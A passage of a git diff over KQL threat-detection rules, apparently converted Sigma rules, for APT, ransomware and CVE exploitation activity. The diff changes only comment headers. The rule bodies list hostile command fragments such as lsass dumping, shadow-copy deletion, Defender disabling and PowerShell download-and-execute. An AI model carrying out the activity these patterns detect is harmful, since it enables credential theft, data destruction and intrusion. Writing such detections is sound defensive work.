 | where (InitiatingProcessFolderPath contains "\\java" and (InitiatingProcessFolderPath contains "manageengine" or InitiatingProcessFolderPath contains "ServiceDesk")) and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or 
ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\ssession") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine 
contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy"))) and (not((ProcessCommandLine contains "download.microsoft.com" and ProcessCommandLine contains "manageengine.com" and ProcessCommandLine contains "msiexec")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql
index 4a3312da..60520517 100644
--- a/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql
+++ b/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Onyx Sleet APT File Creation Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-24
-// Level: high
-// Description: Detects file creation activity that is related to Onyx Sleet APT activity
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Onyx Sleet APT File Creation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects file creation activity that is related to Onyx Sleet APT activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith ":\\Windows\\ADFS\\bg\\inetmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql
index 0ca57ef2..795a80c1 100644
--- a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql
+++ b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql
@@ -1,12 +1,12 @@
-// Title: PaperCut MF/NG Exploitation Related Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-25
-// Level: high
-// Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: PaperCut MF/NG Exploitation Related Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-25
+// Level: high
+// Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /c " and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-nop -w hidden" and ProcessCommandLine contains "Invoke-WebRequest" and ProcessCommandLine contains "setup.msi" and ProcessCommandLine contains "-OutFile") or (ProcessCommandLine contains "msiexec " and ProcessCommandLine contains "/i " and ProcessCommandLine contains "setup.msi " and ProcessCommandLine contains "/qn " and ProcessCommandLine contains "IntegratorLogin=fimaribahundq")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql
index b11f6a9f..e0de122d 100644
--- a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql
+++ b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql
@@ -1,12 +1,12 @@
-// Title: PaperCut MF/NG Potential Exploitation
-// Author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea)
-// Date: 2023-04-20
-// Level: high
-// Description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Legitimate administration activity
-
-DeviceProcessEvents
+// Title: PaperCut MF/NG Potential Exploitation
+// Author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea)
+// Date: 2023-04-20
+// Level: high
+// Description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\pc-app.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql
index c4b28c6b..dce74b98 100644
--- a/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql
+++ b/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Peach Sandstorm APT Process Activity Indicators
-// Author: X__Junior (Nextron Systems)
-// Date: 2024-01-15
-// Level: high
-// Description: Detects process creation activity related to Peach Sandstorm APT
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Peach Sandstorm APT Process Activity Indicators
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-01-15
+// Level: high
+// Description: Detects process creation activity related to Peach Sandstorm APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "QP's*(58vaP!tF4"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql
index 19cf9ffb..f50e6cdd 100644
--- a/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential APT10 Cloud Hopper Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-04-07
-// Level: high
-// Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.g0045, attack.t1059.005, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential APT10 Cloud Hopper Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-04-07
+// Level: high
+// Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0045, attack.t1059.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".vbs /shell " and FolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "csvde -f C:\\windows\\web\\" and ProcessCommandLine contains ".log")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql
index bb7a3923..ffde7472 100644
--- a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql
@@ -1,13 +1,13 @@
-// Title: Potential APT FIN7 Exploitation Activity
-// Author: Alex Walston (@4ayymm)
-// Date: 2024-07-29
-// Level: medium
-// Description: Detects potential APT FIN7 exploitation activity as reported by Google.
-// In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats
-// False Positives:
-// - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD)
-
-DeviceProcessEvents
+// Title: Potential APT FIN7 Exploitation Activity
+// Author: Alex Walston (@4ayymm)
+// Date: 2024-07-29
+// Level: medium
+// Description: Detects potential APT FIN7 exploitation activity as reported by Google.
+// In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats
+// False Positives:
+// - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD)
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\notepad++.exe") or (FolderPath endswith "\\notepad++.exe" and InitiatingProcessFolderPath endswith "\\rdpinit.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
index 5a68bf77..2d0933e1 100644
--- a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-04
-// Level: high
-// Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.g0046, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0046, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-noni -nop -exe bypass -f \\\\" and ProcessCommandLine contains "ADMIN$") or (ProcessCommandLine contains "-ex bypass -noprof -nolog -nonint -f" and ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql
index 8f993f71..0c7fb559 100644
--- a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql
@@ -1,10 +1,10 @@
-// Title: Potential APT FIN7 Related PowerShell Script Created
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-04
-// Level: high
-// Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.g0046, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential APT FIN7 Related PowerShell Script Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0046, detection.emerging-threats
+
+DeviceFileEvents
 | where FolderPath in~ ("host_ip.ps1") or FolderPath endswith "_64refl.ps1"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql b/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql
index dfb1022a..82f54647 100644
--- a/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql
@@ -1,12 +1,12 @@
-// Title: Potential APT Mustang Panda Activity Against Australian Gov
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: high
-// Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.g0129, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential APT Mustang Panda Activity Against Australian Gov
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0129, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "copy SolidPDFCreator.dll" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\SolidPDFCreator.dll") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "SolidPDF" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql
index caff29fc..9b01ee53 100644
--- a/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql
@@ -1,10 +1,10 @@
-// Title: Potential Baby Shark Malware Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-02-24
-// Level: high
-// Description: Detects activity that could be related to Baby Shark malware
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.discovery, attack.t1012, attack.t1059.003, attack.t1059.001, attack.t1218.005, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Baby Shark Malware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-24
+// Level: high
+// Description: Detects activity that could be related to Baby Shark malware
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.discovery, attack.t1012, attack.t1059.003, attack.t1059.001, attack.t1218.005, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "powershell.exe mshta.exe http" and ProcessCommandLine contains ".hta") or (ProcessCommandLine contains "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"" or ProcessCommandLine contains "cmd.exe /c taskkill /im cmd.exe" or ProcessCommandLine contains "(New-Object System.Net.WebClient).UploadFile('http")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql
index 30c060eb..6d1167ef 100644
--- a/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql
@@ -1,10 +1,10 @@
-// Title: Potential BlackByte Ransomware Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-25
-// Level: high
-// Description: Detects command line patterns used by BlackByte ransomware in different operations
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.impact, attack.t1485, attack.t1498, attack.t1059.001, attack.t1140, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential BlackByte Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects command line patterns used by BlackByte ransomware in different operations
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.impact, attack.t1485, attack.t1498, attack.t1059.001, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -single " and FolderPath startswith "C:\\Users\\Public\\") or (ProcessCommandLine contains "del C:\\Windows\\System32\\Taskmgr.exe" or ProcessCommandLine contains ";Set-Service -StartupType Disabled $" or ProcessCommandLine contains "powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(" or ProcessCommandLine contains " do start wordpad.exe /p ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql
index 292bd035..fa15c274 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql
@@ -1,10 +1,10 @@
-// Title: Potential CVE-2021-26857 Exploitation Attempt
-// Author: Bhabesh Raj
-// Date: 2021-03-03
-// Level: high
-// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
-// MITRE Tactic: Execution
-// Tags: attack.t1203, attack.execution, cve.2021-26857, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential CVE-2021-26857 Exploitation Attempt
+// Author: Bhabesh Raj
+// Date: 2021-03-03
+// Level: high
+// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution, cve.2021-26857, detection.emerging-threats
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" and (not((FolderPath endswith "wermgr.exe" or FolderPath endswith "WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql
index dff1e1b2..a6b66193 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql
@@ -1,10 +1,10 @@
-// Title: Potential CVE-2021-40444 Exploitation Attempt
-// Author: Florian Roth (Nextron Systems), @neonprimetime
-// Date: 2021-09-08
-// Level: high
-// Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, cve.2021-40444, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential CVE-2021-40444 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems), @neonprimetime
+// Date: 2021-09-08
+// Level: high
+// Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, cve.2021-40444, detection.emerging-threats
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\control.exe" and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) and (not((ProcessCommandLine endswith "\\control.exe input.dll" or ProcessCommandLine endswith "\\control.exe\" input.dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
index 4d683ad4..6f8a15bb 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
@@ -1,13 +1,13 @@
-// Title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
-// Author: @kostastsale
-// Date: 2022-04-25
-// Level: medium
-// Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager.
-// As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats
-// False Positives:
-// - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process.
-
-DeviceProcessEvents
+// Title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
+// Author: @kostastsale
+// Date: 2022-04-25
+// Level: medium
+// Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager.
+// As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats
+// False Positives:
+// - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\prunsrv.exe" and ((ProcessCommandLine contains "/c powershell" and FolderPath endswith "\\cmd.exe") or FolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql
index a3e6f1d8..cd3ae4cf 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql
@@ -1,12 +1,12 @@
-// Title: Potential CVE-2022-29072 Exploitation Attempt
-// Author: frack113, @kostastsale
-// Date: 2022-04-17
-// Level: high
-// Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.
-// 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.
-// The command runs in a child process under the 7zFM.exe process.
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2022-29072, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential CVE-2022-29072 Exploitation Attempt
+// Author: frack113, @kostastsale
+// Date: 2022-04-17
+// Level: high
+// Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.
+// 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.
+// The command runs in a child process under the 7zFM.exe process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2022-29072, detection.emerging-threats
+
+DeviceProcessEvents
 | where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\7zFM.exe") and (not((((ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r ") or (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".cmd" or ProcessCommandLine endswith ".ps1")) or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
index 892d98cf..7b2ce655 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
@@ -1,10 +1,10 @@
-// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-23
-// Level: high
-// Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: high
+// Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+
+DeviceFileEvents
 | where FolderPath endswith "\\wermgr.exe" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\$WinREAgent\\" or FolderPath contains ":\\Windows\\servicing\\LCU\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\" or FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
index 901f562f..e3ec872b 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
@@ -1,12 +1,12 @@
-// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-23
-// Level: high
-// Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: high
+// Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
+// MITRE Tactic: Execution
